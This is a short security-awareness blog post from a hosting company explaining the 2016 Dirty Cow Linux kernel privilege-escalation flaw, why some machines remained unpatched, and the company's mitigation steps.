At the end of October, 2016, a vulnerability called Dirty Cow (CVE-2016-5195) affecting the Linux kernel shook the Free and Open Source Software community. Let us focus on this cybersecurity vulnerability, which is still actively exploited at the time we write this article.

Dirty CowDirty Cow: what is it?

The Dirty Cow vulnerability enables a pirate to escalate their privileges. By combining it with other exploits, a pirate could thus execute code on the targeted machine at a superuser level. The vulnerability affects the Linux kernel from its 2.6.22 version and, consequently, the technologies based on this kernel, like Android, are also compromised. That also explains why the flaw has been in the spotlight.

Dirty Cow exploits Copy-On-Write (COW) functionalities of the kernel, hence its name. That is what pirates use to reach and write on memory spaces which are supposed to be read-only. For more technical details on the exploitation of this vulnerability, consult the “Explaining Dirty COW local root exploit” video of LiveOverflow (12 minutes). The exploit is, according to the security specialist who found the vulnerability, very easy to set up. It also leaves no trace in the system’s logs.

To sum up : the Dirty Cow vulnerability, allowing a pirate to completely take control over a machine or a server, is critical. The protection of the vulnerable information systems is thus vital, despite any additional protection layers you might have! NBS System’s clients, for instance, benefit from a grsecurity kernel, containing an extra security layer compared to standard kernels. It makes the exploit of the vulnerability harder, but does not guarantee the website’s security on the long term.

Why are some machines still vulnerable?

Unlike more “usual” vulnerabilities, Dirty Cow hits the Linux kernel, thus the heart of the solution. Patches have been developed for each Linux distribution (Red Hat, Debian, Ubuntu, SUSE), but also for Android terminals.

However, the update of a machine, and of a machine park when complex information systems are concerned, can take some time! That is why many machines are still vulnerable. NBS System started to install the patches on its infrastructure, and monitors the exploit of the vulnerability on the machines still waiting for the patch. Thus, if a machine is exploited, our teams can act quickly to prevent the pirate from using it to its advantage. Get information from your hosting provider, and update your personal machines!

Lucie Saunois
Lucie Saunois
IT aficionado, specifically when it comes to cybersecurity, since she joined OT Group in 2015, Lucie specializes in making technical, and often complex, topics understandable by anyone.